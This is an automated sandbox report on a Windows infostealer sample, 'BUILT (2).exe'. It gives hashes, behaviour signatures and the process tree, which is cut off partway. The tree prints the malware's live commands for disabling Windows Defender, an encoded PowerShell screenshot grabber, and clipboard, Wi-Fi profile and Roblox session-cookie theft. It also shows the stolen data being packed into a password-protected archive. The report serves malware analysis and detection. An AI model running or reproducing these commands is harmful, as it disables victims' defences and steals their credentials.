Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-01-2025 03:29

General

  • Target

    BUILT (2).exe

  • Size

    6.9MB

  • MD5

    dd7004fc866d6f2872e0771b24d8d206

  • SHA1

    adc25bdc1d43c2fe970870f3f1152029056591f2

  • SHA256

    da5f0322d31a05d525ee8b37a748670be35647c692a85fdb8997742f5fed3524

  • SHA512

    bb64b65790b28cbf78723e49ff21ecfe6d081f41ccccbdc2df1d3ebbd52c05f3e623c49d45820307bd1218bd8412a5ef574870f28e22898f7dfbbdfa72e69dee

  • SSDEEP

    98304:Hr7YzdbM+Q2y+RvK/+6jOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbLqledV1BqDS:Hr7e/vQOjmFQR4MVGFtwLPNledV1YnO

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BUILT (2).exe
    "C:\Users\Admin\AppData\Local\Temp\BUILT (2).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Users\Admin\AppData\Local\Temp\BUILT (2).exe
      "C:\Users\Admin\AppData\Local\Temp\BUILT (2).exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4440
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BUILT (2).exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BUILT (2).exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1332
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3952
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4364
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2316
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:1936
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3164
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:532
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5096
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:4936
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3760
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3588
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3232
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1676
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4708
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4348
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:636
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:3980
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:2500
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:2756
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5100
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1316
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:3256
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:1004
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3532
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2688
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:2348
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:4232
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:4216
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:5088
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:1964
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:1372
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1876
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcbxn1e3\gcbxn1e3.cmdline"
                                5⤵
                                  PID:3760
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA23B.tmp" "c:\Users\Admin\AppData\Local\Temp\gcbxn1e3\CSC1831CB5A96454243BAA885990BBFB86.TMP"
                                    6⤵
                                      PID:1108
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:1376
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:4900
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:432
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:4788
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1936
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:4428
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4628
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4864
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:740
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:3012
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:2664
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:1588
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:5044
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:876
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:4956
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:2372
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:4964
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              4⤵
                                                                PID:3980
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4364
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:1044
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3872
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:4812
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:4628
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20362\rar.exe a -r -hp"linus12" "C:\Users\Admin\AppData\Local\Temp\k0UzV.zip" *"
                                                                    3⤵
                                                                      PID:2176
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI20362\rar.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI20362\rar.exe a -r -hp"linus12" "C:\Users\Admin\AppData\Local\Temp\k0UzV.zip" *
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:932
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                      3⤵
                                                                        PID:2588
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic os get Caption
                                                                          4⤵
                                                                            PID:3588
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                          3⤵
                                                                            PID:1500
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic computersystem get totalphysicalmemory
                                                                              4⤵
                                                                                PID:1560
                                                                            • C:\Windows\system32\cmd.exe
